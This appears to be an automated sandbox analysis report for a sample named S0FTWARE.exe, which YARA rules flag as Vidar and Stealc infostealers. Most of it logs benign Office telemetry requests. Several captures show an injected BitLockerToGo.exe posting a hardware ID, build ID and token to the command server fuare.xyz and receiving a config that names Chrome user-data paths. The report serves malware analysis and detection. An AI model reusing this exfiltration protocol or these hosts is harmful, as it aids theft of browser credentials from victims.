                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:44 UTC  494                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e359ea9f-f01e-001f-36a3-345dc8000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-r178fb8d765dbpv9hC1DFWma700000000130000000000g5c
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:44 UTC  1360               IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                        138192.168.2.549847116.203.0.1594436152C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:45 UTC  316                OUT        POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                                                        Host: fuare.xyz
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-11-14 14:25:45 UTC  256                OUT
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="hwid"36668DB0B13F3235114199-a33c7340-61ca------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"27536a38d3707b6600f28b9d7177a12c------EGCBFIEHIEGCAAAKKKKE--
2024-11-14 14:25:45 UTC  158                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                        Connection: close
2024-11-14 14:25:45 UTC  69                 IN         Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 37 62 31 36 31 66 36 66 38 62 35 30 36 38 66 61 35 66 63 34 39 31 64 62 63 38 63 66 32 36 31 7c 31 7c 30 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3a1|1|1|1|67b161f6f8b5068fa5fc491dbc8cf261|1|0|1|0|0|50000|10


Session ID  Source IP    Source Port  Destination IP  Destination Port
139         192.168.2.5  49848        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:45 UTC  192                OUT        GET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1377
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d174a67d-801e-00a0-4878-352196000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142545Z-1749fc9bdbddrtrhhC1DFWsq8000000002qg00000000bf2f
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:45 UTC | 1377 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
140 | 192.168.2.5 | 49849 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:45 UTC | 192 | OUT | GET /rules/rule700151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:45 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:45 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE0A2434F"
x-ms-request-id: 6d493ab3-701e-0001-5aa7-34b110000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142545Z-1749fc9bdbd4dqj6hC1DFWr4n400000002k000000000hst2
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:45 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.5 | 49852 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:45 UTC | 192 | OUT | GET /rules/rule703451v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:45 UTC | 515 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:45 GMT
Content-Type: text/xml
Content-Length: 1409
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BDFC438CF"
x-ms-request-id: 86712c9d-c01e-007a-5916-36b877000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142545Z-16547b76f7f4k79zhC1DFWu9y00000000ku000000000b9b5
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:45 UTC | 1409 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


Session ID | Source IP | Source Port | Destination IP | Destination Port
142 | 192.168.2.5 | 49850 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:45 UTC | 192 | OUT | GET /rules/rule700150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:45 UTC | 517 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:45 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE54CA33F"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 1d414214-201e-0003-4d32-2cf85a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142545Z-16547b76f7fk9g8vhC1DFW825400000000h000000000h7d5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
143 | 192.168.2.5 | 49851 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:45 UTC | 192 | OUT | GET /rules/rule703450v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:45 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:45 GMT
Content-Type: text/xml
Content-Length: 1372
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE6669CA7"
x-ms-request-id: c5fa2879-c01e-007a-0659-36b877000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142545Z-r178fb8d7656shmjhC1DFWu5kw00000002mg00000000evqw
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:45 UTC | 1372 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port
144 | 192.168.2.5 | 49853 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:46 UTC | 192 | OUT | GET /rules/rule700901v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:46 UTC | 517 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:46 GMT
Content-Type: text/xml
Content-Length: 1408
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE1038EF2"
x-ms-request-id: 295439a2-001e-0065-3ad2-2c0b73000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142546Z-16547b76f7f67wxlhC1DFWah9w0000000kq000000000fygf
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:46 UTC | 1408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session ID | Source IP | Source Port | Destination IP | Destination Port
145 | 192.168.2.5 | 49856 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:46 UTC | 192 | OUT | GET /rules/rule702251v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:46 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:46 GMT
Content-Type: text/xml
Content-Length: 1389
Connection: close
Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE0F427E7"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e8cfdd16-001e-0028-2a00-36c49f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142546Z-16547b76f7fkj7j4hC1DFW0a9g0000000krg00000000chue
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


Session ID | Source IP | Source Port | Destination IP | Destination Port
146 | 192.168.2.5 | 49857 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:46 UTC | 192 | OUT | GET /rules/rule702250v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:46 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:46 GMT
Content-Type: text/xml
Content-Length: 1352
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDD0A87E5"
x-ms-request-id: 2c5022f9-601e-0032-4ea7-34eebb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142546Z-1749fc9bdbdcm45lhC1DFWeab800000002m0000000002vn5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:46 UTC | 1352 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


Session ID | Source IP | Source Port | Destination IP | Destination Port
147 | 192.168.2.5 | 49858 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:46 UTC | 192 | OUT | GET /rules/rule702651v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:46 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:46 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDEC600CC"
x-ms-request-id: 5d91defa-d01e-00ad-0cd2-2ce942000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142546Z-16547b76f7ftdm8dhC1DFWs13g0000000krg00000000b0u7
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:46 UTC | 1395 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        148192.168.2.54985513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:46 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:46 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1371
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BED3D048D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 5a9e749e-101e-000b-39d2-2c5e5c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142546Z-16547b76f7fknvdnhC1DFWxnys0000000kq000000000mxb0
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:46 UTC | 1371 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.5 | 49854 | 116.203.0.159 | 443 | 6152 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:46 UTC | 316 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IJDHCBGHJEGHJJKFHIIE
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                                                        Host: fuare.xyz
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-11-14 14:25:46 UTC | 331 | OUT | Data Ascii: ------IJDHCBGHJEGHJJKFHIIEContent-Disposition: form-data; name="token"67b161f6f8b5068fa5fc491dbc8cf261------IJDHCBGHJEGHJJKFHIIEContent-Disposition: form-data; name="build_id"27536a38d3707b6600f28b9d7177a12c------IJDHCBGHJEGHJJKFHIIECont
2024-11-14 14:25:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:47 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                        Connection: close
2024-11-14 14:25:47 UTC | 2192 | IN | Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                                                                        Start time:09:24:57
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\S0FTWARE.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\S0FTWARE.exe"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x480000
                                                                                                                                                                                                                                                                                                                                                        File size:26'859'520 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:BAE4CCAA9AA2B36270938DDE45D069BE
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2247474253.0000000013A80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2246493920.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.2190543178.0000000013800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.2192615630.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
